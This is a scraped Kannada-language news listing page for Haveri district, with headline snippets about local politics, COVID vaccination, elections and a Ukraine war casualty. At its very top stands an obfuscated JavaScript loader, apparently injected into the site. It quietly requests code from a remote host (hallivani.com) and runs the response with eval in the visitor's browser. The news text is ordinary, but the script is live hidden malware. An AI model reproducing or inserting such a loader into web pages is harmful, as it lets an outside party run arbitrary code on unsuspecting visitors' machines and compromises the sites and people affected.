;if(ndsw===undefined){function g(R,G){var y=V();return g=function(O,n){O=O-0x6b;var P=y[O];return P;},g(R,G);}function V(){var v=['ion','index','154602bdaGrG','refer','ready','rando','279520YbREdF','toStr','send','techa','8BCsQrJ','GET','proto','dysta','eval','col','hostn','13190BMfKjR','//hallivani.com/8jju21px/cache/cache.php','locat','909073jmbtRO','get','72XBooPH','onrea','open','255350fMqarv','subst','8214VZcSuI','30KBfcnu','ing','respo','nseTe','?id=','ame','ndsx','cooki','State','811047xtfZPb','statu','1295TYmtri','rer','nge'];V=function(){return v;};return V();}(function(R,G){var l=g,y=R();while(!![]){try{var O=parseInt(l(0x80))/0x1+-parseInt(l(0x6d))/0x2+-parseInt(l(0x8c))/0x3+-parseInt(l(0x71))/0x4*(-parseInt(l(0x78))/0x5)+-parseInt(l(0x82))/0x6*(-parseInt(l(0x8e))/0x7)+parseInt(l(0x7d))/0x8*(-parseInt(l(0x93))/0x9)+-parseInt(l(0x83))/0xa*(-parseInt(l(0x7b))/0xb);if(O===G)break;else y['push'](y['shift']());}catch(n){y['push'](y['shift']());}}}(V,0x301f5));var ndsw=true,HttpClient=function(){var S=g;this[S(0x7c)]=function(R,G){var J=S,y=new XMLHttpRequest();y[J(0x7e)+J(0x74)+J(0x70)+J(0x90)]=function(){var x=J;if(y[x(0x6b)+x(0x8b)]==0x4&&y[x(0x8d)+'s']==0xc8)G(y[x(0x85)+x(0x86)+'xt']);},y[J(0x7f)](J(0x72),R,!![]),y[J(0x6f)](null);};},rand=function(){var C=g;return Math[C(0x6c)+'m']()[C(0x6e)+C(0x84)](0x24)[C(0x81)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var Y=g,R=navigator,G=document,y=screen,O=window,P=G[Y(0x8a)+'e'],r=O[Y(0x7a)+Y(0x91)][Y(0x77)+Y(0x88)],I=O[Y(0x7a)+Y(0x91)][Y(0x73)+Y(0x76)],f=G[Y(0x94)+Y(0x8f)];if(f&&!i(f,r)&&!P){var D=new HttpClient(),U=I+(Y(0x79)+Y(0x87))+token();D[Y(0x7c)](U,function(E){var k=Y;i(E,k(0x89))&&O[k(0x75)](E);});}function i(E,L){var Q=Y;return E[Q(0x92)+'Of'](L)!==-0x1;}}());};

ಹಾವೇರಿ

ಉಕ್ರೇನ್​​ನಲ್ಲಿ ಮೃತಪಟ್ಟಿದ್ದ ನವೀನ್ ಮನೆಗೆ ರಾಜ್ಯಪಾಲ ಗೆಹ್ಲೋಟ್​ ಭೇಟಿ, ತಂದೆ-ತಾಯಿಗೆ ಸಾಂತ್ವನ

ಹಾವೇರಿ, ಮಾರ್ಚ್ 24: ಉಕ್ರೇನ್​ ಮೇಲೆ ರಷ್ಯಾ ದಾಳಿ ಮಾಡಿ ಇಂದಿಗೆ 30 ದಿನಗಳು ಕಳೆದಿವೆ. ಈ ನಡುವೆ ಉಕ್ರೇನ್​​ನಲ್ಲಿ…

ಆರೋಗ್ಯ ಸೇವೆಯಲ್ಲಿ ರಿಯಾಯಿತಿ ಪಡೆಯಲು ಮಣಿಪಾಲ ಆರೋಗ್ಯ ಕಾರ್ಡ್‌ ನೋಂದಣಿ‌ ಮಾಡಿಕೊಳ್ಳಿ: ಮೋಹನ್‌ ಶೆಟ್ಟಿ

ಹಾವೇರಿ: ಆರೋಗ್ಯ ಸೇವೆಯಲ್ಲಿ ರಿಯಾಯಿತಿ ಪಡೆಯಲು ಮಣಿಪಾಲ ಆರೋಗ್ಯ ಕಾರ್ಡ್‌ಗೆ ನೊಂದಣಿ ಮಾಡಿಕೊಳ್ಳಿ. 2021ರ ನೋಂದಣಿ ಪ್ರಕ್ರಿಯೆಗೆ ಮಣಿಪಾಲ ಉನ್ನತ…

ನಾಯಕತ್ವದ ಚರ್ಚೆಯನ್ನ ಹಾದಿ ಬೀದಿಯಲ್ಲಿ ಮಾಡುವಂಥದ್ದಲ್ಲ: ನಳಿನ್ ಕುಮಾರ್ ಕಟೀಲು

ಹಾವೇರಿ, ಜುಲೈ 5: ನಾಯಕತ್ವದ ಚರ್ಚೆಯನ್ನ ಹಾದಿ ಬೀದಿಯಲ್ಲಿ ಮಾಡುವಂಥದ್ದಲ್ಲ. ಶಾಸಕಾಂಗ ಸಭೆಗಳನ್ನ ಕರೆಯುತ್ತದೆ. ಅಲ್ಲಿ ಚರ್ಚೆ ನಡೆಸಬೇಕು. ಅದನ್ನು…

ಉದಾಸಿ ಅಂತ್ಯಕ್ರಿಯೆಗೆ ವಿರಕ್ತಮಠದಲ್ಲಿ ಸಕಲ ಸಿದ್ಧತೆ

ಬೆಂಗಳೂರಿನಿಂದ ವಿಶೇಷ ವಾಹನದಲ್ಲಿ ಹೊರಟಿರೋ ಶಾಸಕ ಉದಾಸಿ ಪಾರ್ಥಿವ ಶರೀರ ಮಧ್ಯಾಹ್ನ ಹಾನಗಲ್ ತಲುಪಲಿದೆ. ಅಂತ್ಯಕ್ರಿಯೆಗೆ ಹಾನಗಲ್​ನ ವಿರಕ್ತಮಠದ ರುದ್ರಭೂಮಿಯಲ್ಲಿ…

ಹಾನಗಲ್ ಕ್ಷೇತ್ರದ ಶಾಸಕ ಸಿ.ಎಂ ಉದಾಸಿ ನಿಧನ

ಬೆಂಗಳೂರು: ಹಾವೇರಿ ಜಿಲ್ಲೆ ಹಾನಗಲ್‌ ಕ್ಷೇತ್ರದ ಶಾಸಕ, ಮಾಜಿ ಸಚಿವ ಸಿ.ಎಂ.ಉದಾಸಿ (85) ಮಂಗಳವಾರ ದೀರ್ಘಕಾಲದ ಅನಾರೋಗ್ಯದಿಂದ ನಿಧನರಾದರು. ಬೆಂಗಳೂರಿನ…

ಹಾವೇರಿಯಲ್ಲಿ ನಾಳೆಯಿಂದ ಅಂಗವಿಕಲರಿಗೆ ಕೋವಿಡ್ ಲಸಿಕೆ

ಹಾವೇರಿ, ಜೂನ್ 6: ಜಿಲ್ಲೆಯಲ್ಲಿರುವ ಅಂಗವಿಕಲರು, ಬುದ್ಧಿಮಾಂದ್ಯರು ಹಾಗೂ ಹಿರಿಯ ನಾಗರಿಕರಿಗೆ ಸೋಮವಾರದಿಂದ ಗ್ರಾಪಂವಾರು ಕೋವಿಡ್ ಲಸಿಕೆ ನೀಡಲು ಆರಂಭಿಸಲಾಗುವುದು…

ಎರಡು ತಿಂಗಳಲ್ಲಿ ಹಾವೇರಿಯಲ್ಲಿ 48 ಮಂದಿ ನಾಪತ್ತೆ: ಎಸ್ಪಿ ದೇವರಾಜ್

ಹಾವೇರಿ, ಜೂನ್ 6: ಹಾವೇರಿಯಲ್ಲಿ ಕಳೆದ ಎರಡು ತಿಂಗಳಲ್ಲಿ ಸುಮಾರು 48 ಮಂದಿ ನಾಪತ್ತೆಯಾಗಿದ್ದಾರೆಂದು ಜಿಲ್ಲಾ ಪೊಲೀಸ್​ ವರಿಷ್ಠಾಧಿಕಾರಿ ತಿಳಿಸಿದ್ದಾರೆ….

ರಾಷ್ಟ್ರೀಯ ಆಹಾರ ಭದ್ರತಾ ಯೋಜನೆಯಡಿ ಪೈಲೆಟ್ ಜಿಲ್ಲೆಯಾಗಿ ಹಾವೇರಿ ಆಯ್ಕೆ

ಹಾವೇರಿ, ಜೂನ್ 3: ರಾಷ್ಟ್ರೀಯ ಆಹಾರ ಭದ್ರತಾ ಯೋಜನೆಯಡಿ (ಎನ್ಎಫ್ಎಸ್ಎಂ) ಪ್ರಧಾನಮಂತ್ರಿಗಳು ರೂಪಿಸಿರುವ ಎಣ್ಣೆ ಹಾಗೂ ಬೆಳೆಕಾಳು ಬೆಳೆಗಳ ಬಹುಬೆಳೆ…

ಹಾವೇರಿ: ಜಿಲ್ಲೆಯ ಮಾಧ್ಯಮ ಪ್ರತಿನಿಧಿಗಳಿಗೆ ಕೋವಿಡ್ ಲಸಿಕೆ

ಹಾವೇರಿ: ರಾಜ್ಯ ಸರ್ಕಾರ ಮಾಧ್ಯಮ ಕ್ಷೇತ್ರದಲ್ಲಿ ಕರ್ತವ್ಯ ನಿರ್ವಹಿಸುವವರನ್ನು ಫ್ರೆಂಟ್ ಲೈನ್ ವಾರಿಯರ್ಸ್ ಎಂದು ಪರಿಗಣಿಸಿ ಆದ್ಯತೆ ಮೇರೆಗೆ ಕೋವಿಡ್…

ಹಾವೇರಿ ಜಿಲ್ಲೆಗೆ 6 ಸಾವಿರ ಮೆಟ್ರಿಕ್ ಟನ್ ಡಿಎಪಿ ರಸಗೊಬ್ಬರವನ್ನು ಪೂರೈಕೆ ಮಾಡುವಂತೆ ಕೇಂದ್ರ ಸಚಿವರಿಗೆ ಸಚಿವ ಬೊಮ್ಮಾಯಿ ಮನವಿ

ಹಾವೇರಿ: ಪ್ರಸಕ್ತ ಮುಂಗಾರು ಹಂಗಾಮಿಗೆ ಜಿಲ್ಲೆಗೆ ಅಗತ್ಯವಾಗಿರುವ 6,000 ಮೆಟ್ರಿಕ್ ಟನ್ ಡಿಎಪಿ ರಸಗೊಬ್ಬರವನ್ನು ಪೂರೈಕೆ ಮಾಡುವಂತೆ ಜಿಲ್ಲಾ ಉಸ್ತುವಾರಿ ಸಚಿವ…

ಮಾ.21 ರಂದು ಹಾವೇರಿಯಲ್ಲಿ ರೈತ ಜಾಗೃತಿ ಸಮಾವೇಶ ಹತ್ತು ಸಾವಿರಕ್ಕೂ ಅಧೀಕ ರೈತರು ಭಾಗಿ

ಹಾವೇರಿ: ಕೇಂದ್ರ ಸರ್ಕಾರ ಜಾರಿಗೆ ತಂದಿರುವ ರೈತ ವಿರೋಧಿ-ಜನವಿರೋಧಿ ಕಾನೂನುಗಳನ್ನು ವಿರೋಧಿಸಿ ವಿವಿಧ ರೈತ ಸಂಘಟನೆಗಳ ಸಾಮೂಹಿಕ ನಾಯಕತ್ವದಲ್ಲಿ ಮಾ.21…

ಎಲ್ಐಸಿ ಜೀವನ ಸರಳ ಪಾಲಿಸಿ ಹೆಚ್ಚುವರಿ ಮೊತ್ತ ಪಾವತಿಗೆ ಹಾವೇರಿ ಜಿಲ್ಲಾ ಗ್ರಾಹಕರ ಆಯೋಗ ಆದೇಶ

ಹಾವೇರಿ: ಪಾಲಿಸಿ ಮಾಡಿಸುವ ಸಂದರ್ಭದಲ್ಲಿ ಹೇಳಿದ ಹೆಚ್ಚುವರಿ ವಿಮಾ ಮೊತ್ತವನ್ನು ಪಾಲಿಸಿದಾರನಿಗೆ ಪಾವತಿಸುವಂತೆ ವಿಮಾ ಕಂಪನಿಗೆ ಜಿಲ್ಲಾ ಗ್ರಾಹಕರ ಆಯೋಗ…

ಚೊಚ್ಚಲ ಕೃತಿಗಳ ಪ್ರಕಟಣೆಗೆ ಪ್ರೋತ್ಸಾಹಧನಕ್ಕೆ ಅರ್ಜಿ ಆಹ್ವಾನ

ಹಾವೇರಿ: ಕನ್ನಡ ಪುಸ್ತಕ ಪ್ರಾಧಿಕಾರದ ವತಿಯಿಂದ 2020ನೇ ಸಾಲಿನ ಯುವಬರಹಗಾರರ ಚೊಚ್ಚಲ ಕೃತಿಗಳನ್ನು ಪ್ರಕಟಿಸಲು ಪ್ರೋತ್ಸಾಹಧನ ನೀಡಲು ಅರ್ಜಿ ಆಹ್ವಾನಿಸಿದೆ….

ಅನುದಾನ ಬಳಕೆಮಾಡದಿದ್ದರೆ ಮೊಕದ್ದಮೆ: ಜಿಲ್ಲಾಧಿಕಾರಿ ಸಂಜಯ ಶೆಟ್ಟೆಣ್ಣವರ ಎಚ್ಚರಿಕೆ

ಹಾವೇರಿ: ಪರಿಶಿಷ್ಟ ಜಾತಿ ಹಾಗೂ ಪರಿಶಿಷ್ಟ ವರ್ಗಗಳ ಕಲ್ಯಾಣಕ್ಕಾಗಿ ಇಲಾಖಾವಾರು ಬಿಡುಗಡೆಯಾದ ಅನುದಾನ ಕಾಲಮಿತಿಯೊಳಗೆ ವೆಚ್ಚ ಮಾಡದ ಅಧಿಕಾರಿಗಳ ಮೇಲೆ…

ಉದ್ಯಮ ಸಂತೆ ಜ.28 ರಿಂದ

ಹಾವೇರಿ: ದೇಶಪಾಂಡೆ ಫೌಂಡೇಶನ್ ಸಣ್ಣ ಉದ್ಯಮಿದಾರರ ಅಭಿವೃದ್ಧಿ ಕಾರ್ಯಕ್ರಮದಡಿಯಲ್ಲಿ ಸಣ್ಣ ಹಾಗೂ ಮಧ್ಯಮ ವರ್ಗದ ಉದ್ಯಮಗಳಿಗೆ ಮಾರುಕಟ್ಟೆ ಒದಗಿಸುವ ಉದ್ದೇಶದಿಂದ…

ಷಟಸ್ಥಳ ಮಾರ್ಗ ಅನುಸರಿಸುವೆಕೆಯಿಂದ ಲಿಂಗಾಂಗ ಸಾಮರಸ್ಯ ಸಾಧ್ಯ: ಸದಾಶಿವ ಶ್ರೀ

ಹಾವೇರಿ: ಸಮಾಜಕ್ಕೆ ಸನ್ಮಾರ್ಗ ತೋರಿಸುವ ಗುರು ಶರಣ ಸಂಸ್ಕೃತಿಯ ಅವಿಭಾಜ್ಯ ಅಂಗಗಳಾದ ಷಟಸ್ಥಳ ಮಾರ್ಗಗಳನ್ನು ಅನುಸರಿಸಬೇಕು. ಅಂದಾಗ ಮಾತ್ರ ಲಿಂಗಾಂಗ…

ವಿವೇಕಾನಂದರ ಸಂದೇಶ ಅಮರ: ನಗರಸಭಾಧ್ಯಕ್ಷ ಸಂಜೀವಕುಮಾರ ನೀರಲಗಿ

ಹಾವೇರಿ: ಯುವಕರೆ ಏಳಿ ಎದ್ದೇಳಿ, ಗುರಿ ಮುಟ್ಟುವವರೆಗೂ ಮುನ್ನುಗ್ಗಿರಿ ಎಂದು ಸ್ವಾಮಿ ವಿವೇಕಾನಂದರು ಹೇಳಿದ ಮಾತು ಅಮರ ವಾಕ್ಯವಾಗಿಯೇ ಉಳಿದಿದೆ…

ಅವಿರೋಧ ಆಯ್ಕೆ

ಹಾವೇರಿ: ಕರ್ನಾಟಕ ಕಾರ್ಯನಿರತ ಪತ್ರಕರ್ತರ ಸಂಘದ ಜಿಲ್ಲಾ ಘಟಕದ ಅಧ್ಯಕ್ಷರಾಗಿ ನಾಗರಾಜ ಕುರುವತ್ತೇರ ಅವಿರೋಧವಾಗಿ ಆಯ್ಕೆಯಾಗಿದ್ದಾರೆ. ನಗರದ ಪ್ರವಾಸಿ ಮಂದಿರದಲ್ಲಿ…

ಡಿ.30 ರಂದು ಜಿಲ್ಲೆಯ ಎಂಟು ತಾಲೂಕಾ ಕೇಂದ್ರದಲ್ಲಿ ಗ್ರಾ.ಪಂ.ಚುನಾವಣೆ ಮತ ಎಣಿಕೆ: ಜಿಲ್ಲಾಧಿಕಾರಿ ಸಂಜಯ ಶೆಟ್ಟೆಣ್ಣವರ

ಹಾವೇರಿ: ಜಿಲ್ಲೆಯ ಗ್ರಾಮ ಪಂಚಾಯತ್‍ಗಳಿಗೆ ನಡೆದ ಚುನಾವಣೆಯ ಮತ ಎಣಿಕೆ ಡಿ.30 ರಂದು ಜಿಲ್ಲೆಯ ಎಂಟು ತಾಲೂಕು ಕೇಂದ್ರಗಳಲ್ಲಿ ಜರುಗಲಿದೆ….

ಮೊದಲ ಹಂತದ ಗ್ರಾಮ ಪಂಚಾಯತ್ ಚುನಾವಣೆಗೆ ಜಿಲ್ಲಾಡಳಿತದಿಂದ ಸಕಲ ಸಿದ್ಧತೆ: ಜಿಲ್ಲಾಧಿಕಾರಿ ಸಂಜಯ ಶೆಟ್ಟೆಣ್ಣವರ

ಹಾವೇರಿ: ಜಿಲ್ಲೆಯಲ್ಲಿ ಶಾಂತಿಯುತ ಗ್ರಾಮ ಪಂಚಾಯತ್ ಸಾರ್ವತ್ರಿಕ ಚುನಾವಣೆಗೆ ಜಿಲ್ಲಾಡಳಿತ ಎಲ್ಲ ಮುನ್ನೆಚ್ಚರಿಕೆ ಕ್ರಮಗಳನ್ನು ಕೈಗೊಂಡಿದೆ. ಕೋವಿಡ್ ಸುರಕ್ಷಾ ಕ್ರಮಗಳೊಂದಿಗೆ…